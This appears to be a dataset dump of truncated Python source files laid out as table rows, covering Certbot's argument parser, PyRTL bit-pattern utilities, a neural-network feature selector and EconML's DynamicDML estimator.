input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<gh_stars>1-10
"""Certbot command line argument parser"""
import argparse
import copy
import functools
import glob
import sys
from typing import Any
from typing import Dict
from typing import Iterable
from typing import List
from typing import Optional
from typing import Union
import configargparse
from certbot import crypto_util
from certbot import errors
from certbot import util
from certbot._internal import constants
from certbot._internal import hooks
from certbot._internal.cli.cli_constants import ARGPARSE_PARAMS_TO_REMOVE
from certbot._internal.cli.cli_constants import COMMAND_OVERVIEW
from certbot._internal.cli.cli_constants import EXIT_ACTIONS
from certbot._internal.cli.cli_constants import HELP_AND_VERSION_USAGE
from certbot._internal.cli.cli_constants import SHORT_USAGE
from certbot._internal.cli.cli_constants import ZERO_ARG_ACTIONS
from certbot._internal.cli.cli_utils import _Default
from certbot._internal.cli.cli_utils import add_domains
from certbot._internal.cli.cli_utils import CustomHelpFormatter
from certbot._internal.cli.cli_utils import flag_default
from certbot._internal.cli.cli_utils import HelpfulArgumentGroup
from certbot._internal.cli.verb_help import VERB_HELP
from certbot._internal.cli.verb_help import VERB_HELP_MAP
from certbot._internal.display import obj as display_obj
from certbot._internal.plugins import disco
from certbot.compat import os
class HelpfulArgumentParser:
"""Argparse Wrapper.
This class wraps argparse, adding the ability to make --help less
verbose, and request help on specific subcategories at a time, eg
'certbot --help security' for security options.
"""
def __init__(self, args: List[str], plugins: Iterable[str],
detect_defaults: bool = False) -> None:
from certbot._internal import main
self.VERBS = {
"auth": main.certonly,
"certonly": main.certonly,
"run": main.run,
"install": main.install,
"plugins": main.plugins_cmd,
"register": main.register,
"update_account": main.update_account,
"unregister": main.unregister,
"renew": main.renew,
"revoke": main.revoke,
"rollback": main.rollback,
"everything": main.run,
"update_symlinks": main.update_symlinks,
"certificates": main.certificates,
"delete": main.delete,
"enhance": main.enhance,
}
# Get notification function for printing
self.notify = display_obj.NoninteractiveDisplay(sys.stdout).notification
# List of topics for which additional help can be provided
HELP_TOPICS = ["all", "security", "paths", "automation", "testing"]
HELP_TOPICS += list(self.VERBS) + self.COMMANDS_TOPICS + ["manage"]
plugin_names = list(plugins)
self.help_topics = HELP_TOPICS + plugin_names + [None] # type: ignore
self.detect_defaults = detect_defaults
self.args = args
if self.args and self.args[0] == 'help':
self.args[0] = '--help'
self.determine_verb()
help1 = self.prescan_for_flag("-h", self.help_topics)
help2 = self.prescan_for_flag("--help", self.help_topics)
self.help_arg: Union[str, bool]
if isinstance(help1, bool) and isinstance(help2, bool):
self.help_arg = help1 or help2
else:
self.help_arg = help1 if isinstance(help1, str) else help2
short_usage = self._usage_string(plugins, self.help_arg)
self.visible_topics = self.determine_help_topics(self.help_arg)
# elements are added by .add_group()
self.groups: Dict[str, argparse._ArgumentGroup] = {}
# elements are added by .parse_args()
self.defaults: Dict[str, Any] = {}
self.parser = configargparse.ArgParser(
prog="certbot",
usage=short_usage,
formatter_class=CustomHelpFormatter,
args_for_setting_config_path=["-c", "--config"],
default_config_files=flag_default("config_files"),
config_arg_help_message="path to config file (default: {0})".format(
" and ".join(flag_default("config_files"))))
# This is the only way to turn off overly verbose config flag documentation
self.parser._add_config_file_help = False
self.verb: str
# Help that are synonyms for --help subcommands
COMMANDS_TOPICS = ["command", "commands", "subcommand", "subcommands", "verbs"]
def _list_subcommands(self) -> str:
longest = max(len(v) for v in VERB_HELP_MAP)
text = "The full list of available SUBCOMMANDS is:\n\n"
for verb, props in sorted(VERB_HELP):
doc = props.get("short", "")
text += '{0:<{length}} {1}\n'.format(verb, doc, length=longest)
text += "\nYou can get more help on a specific subcommand with --help SUBCOMMAND\n"
return text
def _usage_string(self, plugins: Iterable[str], help_arg: Union[str, bool]) -> str:
"""Make usage strings late so that plugins can be initialised late
:param plugins: all discovered plugins
:param help_arg: False for none; True for --help; "TOPIC" for --help TOPIC
:rtype: str
:returns: a short usage string for the top of --help TOPIC)
"""
if "nginx" in plugins:
nginx_doc = "--nginx Use the Nginx plugin for authentication & installation"
else:
nginx_doc = "(the certbot nginx plugin is not installed)"
if "apache" in plugins:
apache_doc = "--apache Use the Apache plugin for authentication & installation"
else:
apache_doc = "(the certbot apache plugin is not installed)"
usage = SHORT_USAGE
if help_arg is True:
self.notify(usage + COMMAND_OVERVIEW % (apache_doc, nginx_doc) + HELP_AND_VERSION_USAGE)
sys.exit(0)
elif help_arg in self.COMMANDS_TOPICS:
self.notify(usage + self._list_subcommands())
sys.exit(0)
elif help_arg == "all":
# if we're doing --help all, the OVERVIEW is part of the SHORT_USAGE at
# the top; if we're doing --help someothertopic, it's OT so it's not
usage += COMMAND_OVERVIEW % (apache_doc, nginx_doc)
elif isinstance(help_arg, str):
custom = VERB_HELP_MAP.get(help_arg, {}).get("usage", None)
usage = custom if custom else usage
# Only remaining case is help_arg == False, which gives effectively usage == SHORT_USAGE.
return usage
def remove_config_file_domains_for_renewal(self, parsed_args: argparse.Namespace) -> None:
"""Make "certbot renew" safe if domains are set in cli.ini."""
# Works around https://github.com/certbot/certbot/issues/4096
if self.verb == "renew":
for source, flags in self.parser._source_to_settings.items(): # pylint: disable=protected-access
if source.startswith("config_file") and "domains" in flags:
parsed_args.domains = _Default() if self.detect_defaults else []
def parse_args(self) -> argparse.Namespace:
"""Parses command line arguments and returns the result.
:returns: parsed command line arguments
:rtype: argparse.Namespace
"""
parsed_args = self.parser.parse_args(self.args)
parsed_args.func = self.VERBS[self.verb]
parsed_args.verb = self.verb
self.remove_config_file_domains_for_renewal(parsed_args)
if self.detect_defaults:
return parsed_args
self.defaults = {key: copy.deepcopy(self.parser.get_default(key))
for key in vars(parsed_args)}
# Do any post-parsing homework here
if self.verb == "renew":
if parsed_args.force_interactive:
raise errors.Error(
"{0} cannot be used with renew".format(
constants.FORCE_INTERACTIVE_FLAG))
parsed_args.noninteractive_mode = True
if parsed_args.force_interactive and parsed_args.noninteractive_mode:
raise errors.Error(
"Flag for non-interactive mode and {0} conflict".format(
constants.FORCE_INTERACTIVE_FLAG))
if parsed_args.staging or parsed_args.dry_run:
self.set_test_server(parsed_args)
if parsed_args.csr:
self.handle_csr(parsed_args)
if parsed_args.must_staple:
parsed_args.staple = True
if parsed_args.validate_hooks:
hooks.validate_hooks(parsed_args)
if parsed_args.allow_subset_of_names:
if any(util.is_wildcard_domain(d) for d in parsed_args.domains):
raise errors.Error("Using --allow-subset-of-names with a"
" wildcard domain is not supported.")
if parsed_args.hsts and parsed_args.auto_hsts:
raise errors.Error(
"Parameters --hsts and --auto-hsts cannot be used simultaneously.")
if isinstance(parsed_args.key_type, list) and len(parsed_args.key_type) > 1:
raise errors.Error(
"Only *one* --key-type type may be provided at this time.")
return parsed_args
def set_test_server(self, parsed_args: argparse.Namespace) -> None:
"""We have --staging/--dry-run; perform sanity check and set config.server"""
# Flag combinations should produce these results:
# | --staging | --dry-run |
# ------------------------------------------------------------
# | --server acme-v02 | Use staging | Use staging |
# | --server acme-staging-v02 | Use staging | Use staging |
# | --server <other> | Conflict error | Use <other> |
default_servers = (flag_default("server"), constants.STAGING_URI)
if parsed_args.staging and parsed_args.server not in default_servers:
raise errors.Error("--server value conflicts with --staging")
if parsed_args.server in default_servers:
parsed_args.server = constants.STAGING_URI
if parsed_args.dry_run:
if self.verb not in ["certonly", "renew"]:
raise errors.Error("--dry-run currently only works with the "
"'certonly' or 'renew' subcommands (%r)" % self.verb)
parsed_args.break_my_certs = parsed_args.staging = True
if glob.glob(os.path.join(parsed_args.config_dir, constants.ACCOUNTS_DIR, "*")):
# The user has a prod account, but might not have a staging
# one; we don't want to start trying to perform interactive registration
parsed_args.tos = True
parsed_args.register_unsafely_without_email = True
def handle_csr(self, parsed_args: argparse.Namespace) -> None:
"""Process a --csr flag."""
if parsed_args.verb != "certonly":
raise errors.Error("Currently, a CSR file may only be specified "
"when obtaining a new or replacement "
"via the certonly command. Please try the "
"certonly command instead.")
if parsed_args.allow_subset_of_names:
raise errors.Error("--allow-subset-of-names cannot be used with --csr")
csrfile, contents = parsed_args.csr[0:2]
typ, csr, domains = crypto_util.import_csr_file(csrfile, contents)
# This is not necessary for webroot to work, however,
# obtain_certificate_from_csr requires parsed_args.domains to be set
for domain in domains:
add_domains(parsed_args, domain)
if not domains:
# TODO: add CN to domains instead:
raise errors.Error(
"Unfortunately, your CSR %s needs to have a SubjectAltName for every domain"
% parsed_args.csr[0])
parsed_args.actual_csr = (csr, typ)
csr_domains = {d.lower() for d in domains}
config_domains = set(parsed_args.domains)
if csr_domains != config_domains:
raise errors.ConfigurationError(
"Inconsistent domain requests:\nFrom the CSR: {0}\nFrom command line/config: {1}"
.format(", ".join(csr_domains), ", ".join(config_domains)))
def determine_verb(self) -> None:
"""Determines the verb/subcommand provided by the user.
This function works around some of the limitations of argparse.
"""
if "-h" in self.args or "--help" in self.args:
# all verbs double as help arguments; don't get them confused
self.verb = "help"
return
for i, token in enumerate(self.args):
if token in self.VERBS:
verb = token
if verb == "auth":
verb = "certonly"
if verb == "everything":
verb = "run"
self.verb = verb
self.args.pop(i)
return
self.verb = "run"
def prescan_for_flag(self, flag: str, possible_arguments: Iterable[str]) -> Union[str, bool]:
"""Checks cli input for flags.
Check for a flag, which accepts a fixed set of possible arguments, in
the command line; we will use this information to configure argparse's
help correctly. Return the flag's argument, if it has one that matches
the sequence @possible_arguments; otherwise return whether the flag is
present.
"""
if flag not in self.args:
return False
pos = self.args.index(flag)
try:
nxt = self.args[pos + 1]
if nxt in possible_arguments:
return nxt
except IndexError:
pass
return True
def add(self, topics: Optional[Union[List[Optional[str]], str]], *args: Any,
**kwargs: Any) -> None:
"""Add a new command line argument.
:param topics: str or [str] help topic(s) this should be listed | |
be true when w is '0101' or '0111'
m, _ = match_bitpattern(w, '??01') # m be true when last two bits of w are '01'
m, _ = match_bitpattern(w, '??_0 1') # spaces/underscores are ignored, same as line above
m, (a, b) = match_pattern(w, '01aa1?bbb11a') # all bits with same letter make up same field
m, fs = match_pattern(w, '01aa1?bbb11a', {'a': 'foo', 'b': 'bar'}) # fields fs.foo, fs.bar
"""
w = as_wires(w)
if not isinstance(bitpattern, six.string_types):
raise PyrtlError('bitpattern must be a string')
nospace_string = ''.join(bitpattern.replace('_', '').split())
if len(w) != len(nospace_string):
raise PyrtlError('bitpattern string different length than wirevector provided')
lsb_first_string = nospace_string[::-1] # flip so index 0 is lsb
zero_bits = [w[index] for index, x in enumerate(lsb_first_string) if x == '0']
one_bits = [w[index] for index, x in enumerate(lsb_first_string) if x == '1']
match = rtl_all(*one_bits) & ~rtl_any(*zero_bits)
# Since only Python 3.7 and above guarantees maintaining insertion order in dictionaries,
# do all of this to make sure we can maintain the ordering in the returned Tuple.
# Order of fields is determined based on left-to-right ordering in original string.
def field_name(name):
if field_map is not None:
if name not in field_map:
raise PyrtlError('field_map argument has been given, '
'but %s field is not present' % name)
return field_map[name]
return name
fields = collections.defaultdict(list)
for i, c in enumerate(lsb_first_string):
if c not in '01?':
fields[c].append(w[i])
fields = sorted(fields.items(), key=lambda m: nospace_string.index(m[0])) # now list of tuples
Fields = collections.namedtuple('Fields', ' '.join(field_name(name) for name, _ in fields))
fields = Fields(**{field_name(k): concat_list(l) for k, l in fields})
return MatchedFields(match, fields)
def bitpattern_to_val(bitpattern, *ordered_fields, **named_fields):
""" Return an unsigned integer representation of field format filled with the provided values.
:param bitpattern: A string holding the pattern (of bits and wildcards) to match
:param ordered_fields: A list of parameters to be matched to the provided bit pattern in
the order provided. If ordered_fields are provided then no named_fields can be used.
:param named_fields: A list of parameters to be matched to the provided bit pattern in
by the names provided. If named_fields are provided then no ordered_fields can be used.
A special keyword argument, 'field_map', can be provided, which will allow you specify
a correspondence between the 1-letter field names in the bitpattern string and longer,
human readable field names (see example below).
:return: An unsigned integer carrying the result of the field substitution.
This function will compare take a specified pattern of bits, where some
of the pattern can be "wildcard" bits. The wildcard bits must all be named with a single
letter and, unlike the related function ``match_bitpattern``, no "?" can be used. The function
will take the provided bitpattern and create an integer that substitutes the provided fields
in for the given wildcards at the bit level. This sort of bit substitution is useful when
creating values for testing when the resulting values will be "chopped" up by the hardware
later (e.g. instruction decode or other bitfield heavy functions).
If a special keyword argument, 'field_map', is provided, then the named fields provided
can be longer, human-readable field names, which will correspond to the field in the
bitpattern according to the field_map. See the third example below.
Examples::
bitpattern_to_val('0000000sssssrrrrr000ddddd0110011', s=2, r=1, d=3) # RISCV ADD instr
# evaluates to 0b00000000000100010000000110110011
bitpattern_to_val('iiiiiiisssssrrrrr010iiiii0100011', i=1, s=4, r=3) # RISCV SW instr
# evaluates to 0b00000000001100100010000010100011
bitpattern_to_val(
'iiiiiiisssssrrrrr010iiiii0100011',
imm=1, rs2=4, rs1=3,
field_map={'i': 'imm', 's': 'rs2', 'r': 'rs1}
) # RISCV SW instr
# evaluates to 0b00000000001100100010000010100011
"""
if len(ordered_fields) > 0 and len(named_fields) > 0:
raise PyrtlError('named and ordered fields cannot be mixed')
def letters_in_field_order():
seen = []
for c in bitpattern:
if c != '0' and c != '1' and c not in seen:
seen.append(c)
return seen
field_map = None
if 'field_map' in named_fields:
field_map = named_fields['field_map']
named_fields.pop('field_map')
bitlist = []
lifo = letters_in_field_order()
if ordered_fields:
if len(lifo) != len(ordered_fields):
raise PyrtlError('number of fields and number of unique patterns do not match')
intfields = [int(f) for f in ordered_fields]
else:
if len(lifo) != len(named_fields):
raise PyrtlError('number of fields and number of unique patterns do not match')
try:
def fn(n):
return field_map[n] if field_map else n
intfields = [int(named_fields[fn(n)]) for n in lifo]
except KeyError as e:
raise PyrtlError('bitpattern field %s was not provided in named_field list' % e.args[0])
fmap = dict(zip(lifo, intfields))
for c in bitpattern[::-1]:
if c == '0' or c == '1':
bitlist.append(c)
elif c == '?':
raise PyrtlError('all fields in the bitpattern must have names')
else:
bitlist.append(str(fmap[c] & 0x1)) # append lsb of the field
fmap[c] = fmap[c] >> 1 # and bit shift by one position
for f in fmap:
if fmap[f] not in [0, -1]:
raise PyrtlError('too many bits given to value to fit in field %s' % f)
if len(bitpattern) != len(bitlist):
raise PyrtlInternalError('resulting values have different bitwidths')
final_str = ''.join(bitlist[::-1])
return int(final_str, 2)
def chop(w, *segment_widths):
""" Returns a list of WireVectors each a slice of the original 'w'
:param w: The WireVector to be chopped up into segments
:param segment_widths: Additional arguments are integers which are bitwidths
:return: A list of WireVectors each with a proper segment width
This function chops a WireVector into a set of smaller WireVectors of different
lengths. It is most useful when multiple "fields" are contained with a single
wirevector, for example when breaking apart an instruction. For example, if
you wish to break apart a 32-bit MIPS I-type (Immediate) instruction you know
it has an 6-bit opcode, 2 5-bit operands, and 16-bit offset. You could take
each of those slices in absolute terms: offset=instr[0:16], rt=instr[16:21]
and so on, but then you have to do the arithmetic yourself. With this function
you can do all the fields at once which can be seen in the examples below.
As a check, chop will throw an error if the sum of the lengths of the fields
given is not the same as the length of the wirevector to chop. Not also that
chop assumes that the "rightmost" arguments are the least signficant bits
(just like pyrtl concat) which is normal for hardware functions but makes the
list order a little counter intuitive.
Examples: ::
opcode, rs, rt, offset = chop(instr, 6, 5, 5, 16) # MIPS I-type instruction
opcode, instr_index = chop(instr, 6, 26) # MIPS J-type instruction
opcode, rs, rt, rd, sa, function = chop(instr, 6, 5, 5, 5, 5, 6) # MIPS R-type
msb, middle, lsb = chop(data, 1, 30, 1) # breaking out the most and least sig bit
"""
w = as_wires(w)
for seg in segment_widths:
if not isinstance(seg, int):
raise PyrtlError('segment widths must be integers')
if sum(segment_widths) != len(w):
raise PyrtlError('sum of segment widths must equal length of wirevetor')
n_segments = len(segment_widths)
starts = [sum(segment_widths[i + 1:]) for i in range(n_segments)]
ends = [sum(segment_widths[i:]) for i in range(n_segments)]
return [w[s:e] for s, e in zip(starts, ends)]
def input_list(names, bitwidth=None):
""" Allocate and return a list of Inputs.
:param names: Names for the Inputs. Can be a list or single comma/space-separated string
:param bitwidth: The desired bitwidth for the resulting Inputs.
:return: List of Inputs.
Equivalent to: ::
wirevector_list(names, bitwidth, wvtype=pyrtl.wire.Input)
"""
return wirevector_list(names, bitwidth, wvtype=Input)
def output_list(names, bitwidth=None):
""" Allocate and return a list of Outputs.
:param names: Names for the Outputs. Can be a list or single comma/space-separated string
:param bitwidth: The desired bitwidth for the resulting Outputs.
:return: List of Outputs.
Equivalent to: ::
wirevector_list(names, bitwidth, wvtype=pyrtl.wire.Output)
"""
return wirevector_list(names, bitwidth, wvtype=Output)
def register_list(names, bitwidth=None):
""" Allocate and return a list of Registers.
:param names: Names for the Registers. Can be a list or single comma/space-separated string
:param bitwidth: The desired bitwidth for the resulting Registers.
:return: List of Registers.
Equivalent to: ::
wirevector_list(names, bitwidth, wvtype=pyrtl.wire.Register)
"""
return wirevector_list(names, bitwidth, wvtype=Register)
def wirevector_list(names, bitwidth=None, wvtype=WireVector):
""" Allocate and return a list of WireVectors.
| |
<gh_stars>0
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from typing import Union
from typing_extensions import Literal
import warnings
from tqdm import tqdm
import os
class Mlp(nn.Module):
def __init__(self, inSize:int, hiddenSize:int,outputSize:int,outputFuntion:nn = nn.Sigmoid,skaling:float = 10.0, layerDepth:int = 4, dropout:float = 0.0):
"""Create a Pytorch Model for the Wrapper part
Args:
inSize (int): the number of features
hiddenSize (int): number of Hidden Size Neurons
outputSize (int): output dimension
outputFuntion (torch.nn): output function. Defaults to nn.Sigmoid
skaling (float, optional): the skaling of the SNE, recomended is 0.25 to 10. Defaults to 10.
layerDepth (int, optional): number of Hidden layers. Defaults to 4.
dropout (float, optional): If dropout should be used if 0.0 dropout wont be used. Defaults to 0.0.
"""
super(Mlp, self).__init__()
sne = []
sne.append(nn.Linear(inSize,int(inSize*skaling)))
sne.append(nn.ReLU())
if(dropout != 0.0):
sne.append(nn.Dropout(dropout))
sne.append(nn.Linear(int(inSize*skaling),int(inSize*skaling)))
sne.append(nn.ReLU())
if(dropout != 0.0):
sne.append(nn.Dropout(dropout))
sne.append(nn.Linear(int(inSize*skaling), inSize))
sne.append(nn.Hardsigmoid())
#this is where the magic happens, this is the SNE Block which will give weights to each feature
self.sne = nn.Sequential(*sne)
decisionModel = []
#Input layer
decisionModel.append(nn.Linear(inSize,hiddenSize))
decisionModel.append(nn.ReLU())
if(dropout != 0.0):
decisionModel.append(nn.Dropout(dropout))
#hidden layer
for _ in range(layerDepth):
decisionModel.append(nn.Linear(hiddenSize,hiddenSize))
decisionModel.append(nn.ReLU())
if(dropout != 0.0):
decisionModel.append(nn.Dropout(dropout))
#outputLayer
decisionModel.append(nn.Linear(hiddenSize, outputSize))
decisionModel.append(outputFuntion())
self.decisionModel = nn.Sequential(*decisionModel)
def forward(self, x):
w = self.sne(x)
return self.decisionModel(w*x), w
class FeatureSelector():
def __init__(self, numberOfFeatures:int,
toDelPerStep:int = 1,
iterations:int = 1,
hiddenSize: int = 70,
outputFunction: "nnLoss" = nn.Sigmoid,
skalingLayer: float = 10.0,
layerDepth: int = 4,
dropout: float = 0.0,
device: Literal["auto", "cuda", "cpu"] = "auto",
loss:Union["function", Literal["mse", "bce"]] = "mse",
validationMetric:"function" = F.mse_loss,
optimizer:Literal["optimizerClass","sgd", "rmsprop"] = "sgd",
learnRate:float = 0.01,
momentum: float = 0.9,
weightDecay: float = 0.0,
batchSize : int = 100,
maxEpochs : int = 800,
patience: int = 6,
verbose: Literal[0,1,2] = 1,
dataSkaling: Literal["auto", None, "minMax", "meanStd"] = "auto"):
"""Initialize the main class
Args:
numberOfFeatures (int): the number of features it should reduce to per iteration. Meaning at the end it can come out with more features then this number here, depending on the number of iterations
toDelPerStep (int, optional): This is still a backward wrapper method of removing the features. This means How many Features should be removed for each learning of a Neural Network. A Higher Number means the programm will be faster, but maybe not to accurate depending on the data . Defaults to 1.
iterations (int, optional): How often schould the Programm run from the beginning. The more often it runs the more stable the output will be, but it will take longer. Defaults to 1.
hiddenSize (int, optional): the Hidden Size of the Klassifikation Part of the Model. Defaults to 70.
outputFunction (nnLoss, optional): the Output Funktion of the Model, if you don't want to have an Outputfunktion put nn.Identity(). Defaults to nn.Sigmoid.
skalingLayer (float, optional): the Skaling Factor of the Attention part of the model (hiddensize of attention = skaling* insize), probably should be 1.0-10.0. Defaults to 10.0.
layerDepth (int, optional): the number of Hiddenlayers in the Classifiaction part of the model. Defaults to 4.
dropout (float, optional): the dropout of the model, Out of experience this doesn't matter to much for my examples. Defaults to 0.0.
device (Literal["auto", "cuda", "cpu"], optional): the device the model should be trained on, if "auto", it will look if you have a cuda system or not and decide on there own. other Values you can choose from are "cpu", "cuda". Defaults to "auto".
loss (Union["function", Literal["mse", "bce"]], optional): the loss function that it should be trained on. you can just put your own funtin in there, in the form of pytorch Loss funtions like torch.nn.F.mse_loss. Defaults to "mse".
validationMetric (function, optional): Its recomended to use Something like BER, buts thats for the Specific Tasks, But it won't work if you use a Metric like Accuracy, because the code needs a Metric where the lower the metric the better. Defaults to F.mse_loss.
optimizer (Literal["optimizerClass","sgd", "rmsprop"], optional): which optimizer to use for this, please use an optimizer that has momentum and weight decay from torch.optim, else that will raise an error probablys. Defaults to "sgd".
learnRate (float, optional): the learnrate for the optimizer. Defaults to 0.01.
momentum (float, optional): the momentum for the optimizer(if you want to use RMSProp use a lower momentum). Defaults to 0.9.
weightDecay (float, optional): the weight decay for the optimizer. Defaults to 0.0.
batchSize (int, optional): the batch size to train and evalute the mode. Defaults to 100.
maxEpochs (int, optional): the maximal epochs to train the model. Defaults to 800.
patience (int, optional): This is for early Stopping the training, if the number is 6 for example, then it will test if the smoothed validation metric curve raises the value for 6 successively values. Defaults to 6.
verbose (Literal[0,1,2], optional): the amount of information that is printed out, the higher the number the more information is printed out but choose between 0,1,2. Defaults to 1.
dataSkaling (Literal["auto", None, "minMax", "meanStd"], optional): the skaling of the input data, "auto" just meaning there will be a min max Skale, if you want to use a custom skaling then skale the data beforehand and put None as a skaling. Defaults to "auto".
"""
self.numberOfFeatures = numberOfFeatures
self.toDelPerStep = toDelPerStep
self.iterations = iterations
self.hiddenSize = hiddenSize
self.outputFunction = outputFunction
self.skalingLayer = skalingLayer
self.layerDepth = layerDepth
self.dropout = dropout
if(device == "auto"):
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
else:
self.device = device
if(type(loss) == str):
if(loss == "mse"):
self.loss = F.mse_loss
elif(loss == "bce"):
self.loss = F.binary_cross_entropy
else:
warnings.warn(f"Couldn't interpret {loss}, going to go with the default mse")
self.loss = F.mse_loss
else:
self.loss = loss
self.validationMetric = validationMetric
if(type(optimizer) == str):
if(optimizer == "sgd"):
self.optimizer = torch.optim.SGD
elif(optimizer == "rmsprop"):
self.optimizer = torch.optim.RMSprop
else:
warnings.warn(f"Couldn't interpret {optimizer}, going to go with the default sgd")
self.optimizer = torch.optim.SGD
else:
self.optimizer = optimizer
self.learnRate = learnRate
self.momentum = momentum
self.weightDecay = weightDecay
self.batchSize = batchSize
self.maxEpochs = maxEpochs
self.patience = patience
self.verbose = verbose
self.dataSkaling = dataSkaling
if(self.dataSkaling not in ["auto", None, "minMax", "meanStd"]):
warnings.warn(f"Couldn't interpret {self.dataSkaling}, going to go with no normailzation")
#this is for the early Stopping method, this will smoothe out the curve, so we can see if the model is overfitting or not
#more information @ https://en.wikipedia.org/wiki/Savitzky–Golay_filter
self.savitzkyGolayFilter:np.ndarray = np.array([15, -55, 30, 135, 179, 135, 30, -55, 15])/429
self.bestDict = {}
def fit(self,X:np.ndarray,Y:np.ndarray,validationData:Union[Literal["auto"], tuple] = "auto")->dict:
"""The Funktion Called to do the reduction of data
Args:
X (np.ndarray): the input data
Y (np.ndarray): the target data
validationData (Union[Literal["auto"], tuple] optional): if auto it will do a random 20% split of the input data, but you can also fill in ur custom data as a tuple meaning (valX,ValY). Defaults to "auto".
Returns:
dict: the best indicies and how often they came up per iteration (the more often a feature is recognised as a better feature the better it probobly is)
"""
#good practice
self.randomSeed = np.random.randint(0,1000)
np.random.seed(self.randomSeed)
if(self.verbose > 1):
print(f"random seed for this run is {self.randomSeed}")
#If auto Split these two with a 20% split ratio, else use the data provided
if(validationData == "auto"):
testTrainSplit = np.random.choice([True, False], X.shape[0], p = [0.8,0.2])
self.trainIn = X[testTrainSplit == True]
self.trainOut = Y [testTrainSplit == True]
self.valIn = X[testTrainSplit == False]
self.valOut = Y[testTrainSplit == False]
if(self.verbose > 1):
print(f"The test train split produced these shapes train: {self.trainIn.shape}, validate: {self.valIn.shape}")
else:
self.trainIn = X
self.trainOut = Y
self.valIn, self.valOut = validationData
if(self.verbose > 1):
print(f"normalizing data")
#normalize the data so that the Network can work with it(Neural Networks don't work good with non Normalized Data)
self.normalize_data()
bestData = {}
if(self.verbose> 0 ):
#remove the Data the iterations are just to remove randomness form the data
for iterNumber in range(self.iterations):
print(f"Iteration: {iterNumber}")
self.chooseList = [i for i in range(self.trainIn.shape[1])]
for _ in tqdm(range(0, self.trainIn.shape[1] - self.numberOfFeatures, self.toDelPerStep)):
rankingDict | |
d_xt] = sigma_tj
if j >= t:
# Calculating the (t, j) block entry (of size n_treatments x n_treatments) of matrix J
m_tj = np.mean(
XT_res[j][t].reshape(-1, d_xt, 1) @ resT_t.reshape(-1, 1, d_xt),
axis=0)
J[t * d_xt:(t + 1) * d_xt,
j * d_xt:(j + 1) * d_xt] = m_tj
return np.linalg.inv(J) @ Sigma @ np.linalg.inv(J).T
class _DynamicFinalWrapper(_FinalWrapper):
def predict_with_res(self, X, T_res):
fts = self._combine(X, T_res, fitting=False)
prediction = self._model.predict(fts)
if self._intercept is not None:
prediction -= self._intercept
return reshape(prediction, (prediction.shape[0],) + self._d_y)
class DynamicDML(LinearModelFinalCateEstimatorMixin, _OrthoLearner):
"""CATE estimator for dynamic treatment effect estimation.
This estimator is an extension of the Double ML approach for treatments assigned sequentially
over time periods.
The estimator is a special case of an :class:`_OrthoLearner` estimator, so it follows the two
stage process, where a set of nuisance functions are estimated in the first stage in a crossfitting
manner and a final stage estimates the CATE model. See the documentation of
:class:`._OrthoLearner` for a description of this two stage process.
Parameters
----------
model_y: estimator or 'auto', optional (default is 'auto')
The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods.
If 'auto' :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
model_t: estimator or 'auto', optional (default is 'auto')
The estimator for fitting the treatment to the features.
If estimator, it must implement `fit` and `predict` methods;
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be applied for discrete treatment,
and :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV`
will be applied for continuous treatment.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
linear_first_stages: bool
Whether the first stage models are linear (in which case we will expand the features passed to
`model_y` accordingly)
discrete_treatment: bool, optional (default is ``False``)
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
Iterables should make sure a group belongs to a single split.
For integer/None inputs, :class:`~sklearn.model_selection.GroupKFold` is used
Unless an iterable is used, we call `split(X, T, groups)` to generate the splits.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with default models:
.. testcode::
:hide:
import numpy as np
np.set_printoptions(suppress=True)
.. testcode::
from econml.dynamic.dml import DynamicDML
np.random.seed(123)
n_panels = 100 # number of panels
n_periods = 3 # number of time periods per panel
n = n_panels * n_periods
groups = np.repeat(a=np.arange(n_panels), repeats=n_periods, axis=0)
X = np.random.normal(size=(n, 1))
T = np.random.normal(size=(n, 2))
y = np.random.normal(size=(n, ))
est = DynamicDML()
est.fit(y, T, X=X, W=None, groups=groups, inference="auto")
>>> est.const_marginal_effect(X[:2])
array([[-0.336..., -0.048..., -0.061..., 0.042..., -0.204...,
0.00667271],
[-0.101..., 0.433..., 0.054..., -0.217..., -0.101...,
-0.159...]])
>>> est.effect(X[:2], T0=0, T1=1)
array([-0.601..., -0.091...])
>>> est.effect(X[:2], T0=np.zeros((2, n_periods*T.shape[1])), T1=np.ones((2, n_periods*T.shape[1])))
array([-0.601..., -0.091...])
>>> est.coef_
array([[ 0.112...],
[ 0.231...],
[ 0.055...],
[-0.125...],
[ 0.049...],
[-0.079...]])
>>> est.coef__interval()
(array([[-0.063...],
[-0.009...],
[-0.114...],
[-0.413...],
[-0.117...],
[-0.262...]]), array([[0.289...],
[0.471...],
[0.225...],
[0.163...],
[0.216...],
[0.103...]]))
"""
def __init__(self, *,
model_y='auto', model_t='auto',
featurizer=None,
fit_cate_intercept=True,
linear_first_stages=False,
discrete_treatment=False,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.fit_cate_intercept = fit_cate_intercept
self.linear_first_stages = linear_first_stages
self.featurizer = clone(featurizer, safe=False)
